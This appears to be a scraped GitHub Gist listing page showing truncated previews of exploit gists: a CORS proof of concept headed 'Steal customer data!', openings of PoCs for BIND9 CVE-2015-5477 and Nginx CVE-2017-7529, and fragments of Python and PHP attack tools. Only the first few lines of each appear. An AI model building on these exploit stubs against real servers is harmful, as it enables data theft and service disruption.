andripwn
/ poccors.html
Last active
August 6, 2022 04:36
Cross Origin Resource Sharing Misconfiguration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <body> | |
| <center> | |
| <h3>Steal customer data!</h3> | |
| <html> | |
| <body> | |
| <button type='button' onclick='cors()'>Exploit</button> | |
| <p id='demo'></p> | |
| <script> |
andripwn
/ StealingCustomer.html
Created
June 13, 2020 12:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <body> | |
| <center> | |
| <h3>Steal customer data!</h3> | |
| <html> | |
| <body> | |
| <button type='button' onclick='cors()'>Exploit</button> | |
| <p id='demo'></p> | |
| <script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding=utf-8 | |
| import requests, re, threading, time | |
| from Exploits import printModule | |
| r = '\033[31m' | |
| g = '\033[32m' | |
| y = '\033[33m' | |
| b = '\033[34m' | |
| m = '\033[35m' | |
| c = '\033[36m' | |
| w = '\033[37m' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from __future__ import print_function | |
| from builtins import range | |
| import sys | |
| import threading | |
| import socket | |
| def setup(host, port): | |
| TAG="Security Test" | |
| PAYLOAD="""%s\r |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import sys | |
| import struct | |
| # construct the DNS query | |
| def dnsquery(domain): | |
| d = "" | |
| for a in domain.split('.'): | |
| d = d + struct.pack("!b" + str(len(a)) + "s", len(a), a) | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import socket | |
| import sys | |
| print('CVE-2015-5477 BIND9 TKEY PoC') | |
| if len(sys.argv) < 2: | |
| print('Usage: ' + sys.argv[0] + ' [target]') | |
| sys.exit(1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request. | |
| #!/usr/bin/python | |
| # -*- coding:utf-8 -*- | |
| # Nginx - Remote Integer Overflow Vulnerability | |
| # CVE-2017-7529 | |
| import requests | |
| import logging |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| date_default_timezone_set("Asia/Jakarta"); | |
| define("OS", strtolower(PHP_OS)); | |
| require_once "RollingCurl/RollingCurl.php"; | |
| require_once "RollingCurl/Request.php"; | |
| echo banner(); | |
| enterlist: | |
| $listname = readline("Enter list : "); |
andripwn
/ filther.php
Created
April 15, 2020 13:16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| date_default_timezone_set('Asia/Jakarta'); | |
| /** | |
| * @Author: Eka Syahwan | |
| * @Date: 2017-09-09 07:04:25 | |
| * @Last Modified by: VanGans | |
| * @Last Modified time: 2018-09-17 17:03:32 | |
| */ | |
| error_reporting(0); | |
| ini_set('memory_limit', '-1'); |